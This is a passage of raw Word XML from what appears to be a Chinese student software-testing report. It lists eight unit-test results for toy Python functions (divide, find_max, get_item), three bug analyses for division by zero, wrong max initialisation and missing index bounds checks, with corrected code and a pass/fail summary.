          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定义测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CC68C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3735070" cy="8313420"/>
            <wp:effectExtent l="0" t="0" r="13970" b="762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5070" cy="831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3D4C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA7B111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F389562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="6285230"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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28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3CF36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD35090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35612979">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D283ACD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606FFE2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024A1ABD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718DAC5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144F6F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD5BD20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9BB963">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6AF6D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B932356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>缺陷分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97ED9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3525520" cy="8543290"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635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5520" cy="854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2A6D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D20C41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3882390"/>
            <wp:effectExtent l="0" t="0" r="3175" b="381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8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0AAF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793974ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="3892550"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890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9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B1A38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0792622A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0BBCCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61FC45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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7B4D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center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测试执行报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DF51D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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6013C4F9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</w:p>
    <w:p w14:paraId="169359E2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【TC001】正常除法运算：10除以2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56925F54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测试函数: divide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEB5A8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输入数据: {'a': 10, 'b': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10301D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期望输出: 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEF2E0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实际输出: 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405837A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测试结果: ✓ PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA9B8B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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C64C0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</w:p>
    <w:p w14:paraId="467C0ED1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【TC002】边界测试：除数为0（缺陷1）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BAEC46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测试函数: divide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AB392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输入数据: {'a': 10, 'b': 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADEC5E3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期望输出: 应抛出异常或返回错误提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4099C2A4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实际输出: ZeroDivisionError: division by zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F9DAD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测试结果: ✗ ERROR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDC9F9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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ABDB89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</w:p>
    <w:p w14:paraId="32AA2A02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【TC003】正常情况：正整数列表找最大值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08075EE5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测试函数: find_max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4810CC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输入数据: {'lst': [1, 5, 3, 9, 2]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1257E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期望输出: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990464B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实际输出: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246314F1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测试结果: ✓ PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35707951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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1387BE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</w:p>
    <w:p w14:paraId="225C0EAA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【TC004】边界测试：全是负数的列表（缺陷2）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD0165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测试函数: find_max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906EFC4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输入数据: {'lst': [-5, -2, -8, -1]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C857053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期望输出: -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15499E46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实际输出: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C15F1A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测试结果: ✗ FAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C5C17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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7FBC4F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</w:p>
    <w:p w14:paraId="05D7B1DF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【TC005】边界测试：包含0的负数列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2858A6BA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测试函数: find_max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368EAB74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输入数据: {'lst': [0, -3, -7, -2]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F436729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期望输出: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E42BF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实际输出: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499DA5CD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测试结果: ✓ PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51635B3F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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1791C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</w:p>
    <w:p w14:paraId="42255913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【TC006】正常情况：获取列表中间元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CBE2FD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测试函数: get_item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A00887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输入数据: {'lst': [10, 20, 30, 40], 'idx': 2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F679603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期望输出: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ABDE29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实际输出: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902D43D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测试结果: ✓ PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B8D15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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BCC6A8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</w:p>
    <w:p w14:paraId="20A04A56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【TC007】边界测试：索引超出范围（缺陷3）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6ACFA5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测试函数: get_item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FA871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输入数据: {'lst': [10, 20, 30], 'idx': 5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA048C6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期望输出: 应抛出异常或返回错误提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE8CF0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实际输出: IndexError: list index out of range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A36343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测试结果: ✗ ERROR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168CAA52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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E78619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</w:p>
    <w:p w14:paraId="69AD149B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【TC008】边界测试：负数索引（Python支持）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E07496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测试函数: get_item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10501E8A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输入数据: {'lst': [10, 20, 30], 'idx': -1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273BB82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期望输出: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A29CD11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实际输出: 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE5B71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测试结果: ✓ PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309622F8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--------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B186B4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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B52E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center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缺陷分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941FCC1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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4FAED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</w:p>
    <w:p w14:paraId="77AEC6A3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缺陷编号: BUG-001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593648A6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缺陷函数: divide(a, b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619863E3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缺陷类型: Error（错误）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BBA355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严重程度: 严重</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094812DE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缺陷描述: 除数为0时未进行检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D02516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触发用例: TC002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162FFD21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现象说明: 当b=0时，程序抛出ZeroDivisionError异常，导致程序崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868A9DF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发现阶段: 单元测试阶段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1EC13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修复建议:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A861D2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建议修复代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE42BB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def divide(a, b):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215675B8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 xml:space="preserve">    if b == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ECB67E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 xml:space="preserve">        raise ValueError("除数不能为0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9012DE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 xml:space="preserve">    return a / b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C334CF3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</w:p>
    <w:p w14:paraId="78CBD4C0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预防措施: 在代码审查阶段加强边界条件检查，确保所有可能导致异常的输入都被处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6BFC6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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8C1F6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缺陷编号: BUG-002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92210E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缺陷函数: find_max(lst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3F7BC5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缺陷类型: Fault（故障）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F5965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严重程度: 中等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F40DD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缺陷描述: 初始化max_val=0导致全负数列表返回错误结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DD215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触发用例: TC004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F14C92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现象说明: 当列表全是负数时（如[-5,-2,-8,-1]），期望返回-1，实际返回0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847D874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发现阶段: 单元测试阶段（边界测试）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08148E15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修复建议:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B20C97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建议修复代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D841BA9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def find_max(lst):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001A6A7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 xml:space="preserve">    if not lst:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686045F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 xml:space="preserve">        raise ValueError("列表不能为空")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F0001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 xml:space="preserve">    max_val = lst[0]  # 使用列表第一个元素初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793B854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 xml:space="preserve">    for x in lst[1:]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B23D66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 xml:space="preserve">        if x &gt; max_val:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53957332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 xml:space="preserve">            max_val = x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101A694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 xml:space="preserve">    return max_val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301CC59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</w:p>
    <w:p w14:paraId="6FA0FF4E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预防措施: 设计测试用例时应包含边界情况，如全负数、全零、空列表等特殊场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473DCE0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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6A934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缺陷编号: BUG-003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B768337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缺陷函数: get_item(lst, idx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15910F5C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缺陷类型: Error（错误）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604BF76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严重程度: 严重</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD9861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缺陷描述: 索引越界时未进行检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA2BA0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触发用例: TC007</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49C8E0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现象说明: 当idx=5超出列表范围[10,20,30]时，抛出IndexError异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27770085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发现阶段: 单元测试阶段（边界测试）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401DF07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 xml:space="preserve">修复建议: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C39EAE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建议修复代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E3969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def get_item(lst, idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B762921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 xml:space="preserve">    if idx &lt; 0 or idx &gt;= len(lst):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C43EE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 xml:space="preserve">        raise IndexError(f"索引{idx}超出范围[0, {len(lst)-1}]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C55891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 xml:space="preserve">    return lst[idx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8AEB4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</w:p>
    <w:p w14:paraId="0C23B577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预防措施: 在处理数组/列表索引操作时，必须进行边界检查。使用自动化测试工具进行边界值分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69658DBC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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B643F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center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测试总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF096F7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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC56950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总测试用例数: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747177D0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通过: 5 (62.5%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB68CF1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失败: 1 (12.5%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935626F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错误: 2 (25.0%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064341B7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</w:p>
    <w:p w14:paraId="1E1C406C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测试结论:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF9872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 xml:space="preserve">  该程序存在3个严重缺陷，需要立即修复后方可上线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3F33D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 xml:space="preserve">  所有缺陷都可以通过完善的单元测试在早期发现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A857FD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</w:p>
    <w:p w14:paraId="39BF9BE2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=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EDADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center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报告生成完成！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501AC6C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=====================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C7FFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="3865ADC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="22106646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="230B403F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="461808C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="126607FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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</w:p>
    <w:p w14:paraId="5C6D20BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
